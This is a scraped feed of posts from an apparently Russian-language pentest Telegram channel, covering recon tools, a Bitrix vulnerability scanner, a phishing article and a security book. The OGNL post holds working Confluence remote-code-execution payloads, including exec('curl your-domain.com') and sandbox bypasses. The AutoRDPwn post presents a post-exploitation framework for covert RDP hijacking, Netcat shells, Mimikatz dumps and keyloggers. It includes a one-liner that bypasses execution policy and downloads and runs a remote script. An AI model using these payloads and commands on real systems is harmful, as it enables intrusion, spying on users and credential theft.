dnsgen
Инструмент dnsgen создает комбинации доменных имен с использованием предоставленных входных данных и списка слов. Он подобен инструменту altdns, но не выполняет резолв DNS. Для этой цели можно использовать dnsx. Инструмент позволяет настраивать извлечение слов и предлагает такие методы, как вставка, замена и манипуляции словами в поддоменах.
Установка:
💬 Канал | 💻 Github
Инструмент dnsgen создает комбинации доменных имен с использованием предоставленных входных данных и списка слов. Он подобен инструменту altdns, но не выполняет резолв DNS. Для этой цели можно использовать dnsx. Инструмент позволяет настраивать извлечение слов и предлагает такие методы, как вставка, замена и манипуляции словами в поддоменах.
Установка:
pip3 install dnsgen
git clone https://github.com/ProjectAnte/dnsgen; cd dnsgen; pip3 install -r requirements.txt; python3 setup.py install
Использование:cat domains.txt | dnsgen - | dnsx -silent
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7
В эту субботу буду на IT-пикнике от Тинькофф. Если кто-то там будет, то увидимся в субботу!
👍9
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Вот смотрю ещё один свежий материал по фишингу от TrustedSec. Главная идея: с помощью HTML инъекции отправить сообщение с доверенного домена.
https://www.trustedsec.com/blog/crafting-emails-with-html-injection
Т.е. это двойной фишинг получается?! Сложно пока, но интересно...
#pentest #redteam #fishing
https://www.trustedsec.com/blog/crafting-emails-with-html-injection
Т.е. это двойной фишинг получается?! Сложно пока, но интересно...
#pentest #redteam #fishing
TrustedSec
Crafting Emails with HTML Injection
If an HTML-enabled email is sent that contains user input, it can be vulnerable to HTML injection, which can allow an attacker to change the entire body…
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤🔥2🌚1
Forwarded from Monkey Hacker
OGNL and sandboxes
Существует такая вещь в
Спустя время, выяснилось, что через😻
Разберу пару вулн в
При рендеринге странице, есть спрятанный параметр😑
Именно он дает нам возможность, поиграться с
Потом нашли проблему в URI. Просто кидай пейлоад сразу в корень(не забудь энкодить) 👍
Увы и ах, но спустя время и это тоже пофиксили. Однако, MCKSysAr нашел байпасс.
Самое банальное - это использовать
Дальше, один из экспертов решил пойти глубже и начал смотреть
Самое вкусное было найдено в
Всем удачи😇
Существует такая вещь в
Java, как Object Graph Notation Language (OGNL) еще один Expression language. Чаще всего данный фреймворк можно заметить в продуктах Apache и Attlasian OGNL вызывает методы несколько иначе, чем Java, поскольку OGNL интерпретируется и должен выбрать нужный метод во время выполнения программы, не имея никакой дополнительной информации о типе, кроме собственно предоставленных аргументов. OGNL всегда выбирает наиболее специфичный метод, типы которого соответствуют заданным аргументамСпустя время, выяснилось, что через
OGNL можно также сделать Command Injection. Метод эксплуатации чем-то напоминает SSTI Разберу пару вулн в
Confluence. Проблемы появлялись из-за isSafeExpressionПри рендеринге странице, есть спрятанный параметр
queryString Именно он дает нам возможность, поиграться с
Java queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022getRuntime\u0022,null).invoke(null,null).exec(\u0022curl your-domain.com\u0022)}%2b\u0027Потом нашли проблему в URI. Просто кидай пейлоад сразу в корень
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Qualys-Response",#a))}Увы и ах, но спустя время и это тоже пофиксили. Однако, MCKSysAr нашел байпасс.
Самое банальное - это использовать
Class, вместо class. Или использовать конкатенацию строк.Дальше, один из экспертов решил пойти глубже и начал смотреть
Abstract Syntax Tree (AST). Как оказалось, AST давал много векторов, для обхода ограниченийСамое вкусное было найдено в
BeanMap, который позволял сделать, уже полноценный байпасс(#@org.apache.commons.beanutils.BeanMap@\\u007b\\u007d).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))Всем удачи
Please open Telegram to view this post
VIEW IN TELEGRAM
👾7⚡1
Книга Хакерство. Физические атаки с использованием хакерских устройств
Издание: 2023
Язык: русский
Сейчас приехала книга "Хакерство. Физические атаки с использованием хакерских устройств" авторства @s0i37. Он написал целую книгу по физическому пентесту с помощью технических средств, так что её можно считать выжимкой из все его опыта опыта! Кстати книга цветная, так что +10 к читабельности.
В книге описано множество атак, которые могут быть совершены с использованием популярных беспроводных технологий и устройств, собранных самостоятельно из общедоступных недорогих деталей, а также показаны способы защиты от них Одни атаки потребуют физического присутствия, другие могут быть проведены на расстоянии. Многие из них потребуют времени, а некоторые позволяют взломать компьютер за секунду.
Не откладывайте покупку на потом! Тем более цена более чем адекватная, я бы даже сказал не существенная.
P.S. предвижу холивары на тему, "где электронная версия?" В ближайшее время её ждать не стоит, т.к. это требование издательства, а не автора.
#book
💬 Канал | 💬 Канал автора книги
Издание: 2023
Язык: русский
Сейчас приехала книга "Хакерство. Физические атаки с использованием хакерских устройств" авторства @s0i37. Он написал целую книгу по физическому пентесту с помощью технических средств, так что её можно считать выжимкой из все его опыта опыта! Кстати книга цветная, так что +10 к читабельности.
В книге описано множество атак, которые могут быть совершены с использованием популярных беспроводных технологий и устройств, собранных самостоятельно из общедоступных недорогих деталей, а также показаны способы защиты от них Одни атаки потребуют физического присутствия, другие могут быть проведены на расстоянии. Многие из них потребуют времени, а некоторые позволяют взломать компьютер за секунду.
Не откладывайте покупку на потом! Тем более цена более чем адекватная, я бы даже сказал не существенная.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤4👾1
Forwarded from KazDevOps
Секреты регулярно просачиваются в конвейеры CI/CD, так как рабочие процессы требуют от разработчиков учетных данных для сторонних ресурсов, с которыми взаимодействует их конвейер.
Рассказываем в новой статье, что же делать, чтобы этого не случилось – ротация секретов, управление их привилегиями, анализ логов на наличие чувствительной информации и не только.
#devops #cicd #secretsleak #secrets
@DevOpsKaz
Рассказываем в новой статье, что же делать, чтобы этого не случилось – ротация секретов, управление их привилегиями, анализ логов на наличие чувствительной информации и не только.
#devops #cicd #secretsleak #secrets
@DevOpsKaz
👍10🆒2
Forwarded from AKTIV.CONSULTING
Ознакомиться с рейтингом уязвимостей
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6👍2🆒2
Quick-tricks
Сканер уязвимостей Bitrix на основе руководства Атаки на Bitrix
Установка:
Для получения дополнительной информации о команде используйте команду
💬 Канал | 💻 Github
Сканер уязвимостей Bitrix на основе руководства Атаки на Bitrix
Установка:
go install github.com/indigo-sadland/quick-tricks@latest
Функционал:quick-tricks [command]
help Справка о любой командеquick Запуск всех быстрых модулей ('recon', 'lfi', 'redirect', 'spoofing' и 'xss')lfi Модуль проверяет наличие конечных точек, уязвимых к Local File Inclusion.rce Модуль пытается эксплуатировать уязвимые компоненты целевого Битрикса.recon Модуль позволяет найти конечные точки страницы входа в систему, раскрыть локальный путь и лицензионный ключ.redirect Модуль проверяет конечные точки, уязвимые к Open Redirect.spoofing Модуль проверяет цель на возможность атаки Content Spoofing.ssrf Модуль позволяет проверить, уязвима ли цель к SSRF.xss Модуль проверяет конечные точки цели, которые потенциально могут быть уязвимы для XSS. (постоянно фолзы, не советую использовать)Для получения дополнительной информации о команде используйте команду
quick-tricks [command] --help
#bitrixPlease open Telegram to view this post
VIEW IN TELEGRAM
❤🔥11👍4
Forwarded from Positive Events
Обещали — публикуем! 👀
На нашем YouTube-канале Positive Events можно посмотреть записи выступлений со стенда Positive Technologies на IT-пикнике, который прошел в Коломенском.
• Уязвимости в тренде? Как понять, что вы не дуршлаг. О том, как создавать продукты, делающие компании неуязвимыми к кибератакам
• Как поймать хакера с помощью искусственного интеллекта
• Как устроен мир вокруг нас: реверс-инжиниринг embedded-устройств
• Преступления в open source: расследуем трояны в Python Package Index
• Как (не) потерять годовой бюджет компании из-за одной ошибки в коде
• Пароль: N4GOR5HK3S!D1TKOROL. Что хакерам известно о паролях
• Как заработать на ипотеку, или Вкатываемся в bug bounty
Приятного просмотра! 🍿
#PositiveЭксперты
На нашем YouTube-канале Positive Events можно посмотреть записи выступлений со стенда Positive Technologies на IT-пикнике, который прошел в Коломенском.
• Уязвимости в тренде? Как понять, что вы не дуршлаг. О том, как создавать продукты, делающие компании неуязвимыми к кибератакам
• Как поймать хакера с помощью искусственного интеллекта
• Как устроен мир вокруг нас: реверс-инжиниринг embedded-устройств
• Преступления в open source: расследуем трояны в Python Package Index
• Как (не) потерять годовой бюджет компании из-за одной ошибки в коде
• Пароль: N4GOR5HK3S!D1TKOROL. Что хакерам известно о паролях
• Как заработать на ипотеку, или Вкатываемся в bug bounty
Приятного просмотра! 🍿
#PositiveЭксперты
👍4
Это powershell фреймворк для постэксплуатации, предназначенный в первую очередь для автоматизации Shadow-RDP атаки на компьютеры под управлением Microsoft Windows. Данная уязвимость позволяет удаленному злоумышленнику просматривать сессию своей жертвы без ее ведома и даже управлять удаленно.
Благодаря дополнительным модулям можно получить удаленный shell через Netcat, сдампить хэши с помощью Mimikatz, загрузить удаленный кейлоггер и многое другое. И все это с помощью интуитивно понятного меню.
Эта тулза может использоваться локально, удаленно или для pivoting'а между серверами.
На системе должен быть PowerShell 4.0+
-admin / -noadmin— явное указание прав доступа для запуска атак;
-nogui— отключает загрузку меню и некоторых цветов, дабы гарантировать общую работоспособность;
-lang— выбор языка интерфейса. [English, Spanish, French, German, Italian, Russian or Portuguese];
-option— выбор типа атаки;
-shadow— выбираем следить или контролировать удаленную машину;
-createuser— не обязательный параметр, который позволяет создаст пользователя
AutoRDPwn:AutoRDPwn на атакуемой машине;-noclean- не обязательный параметр, который отключит автоматический откат параметров после окончания атаки
Дефолтый запуск:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"Запуск сразу с параметрами:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
#windows #pentest #powershell
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8⚡3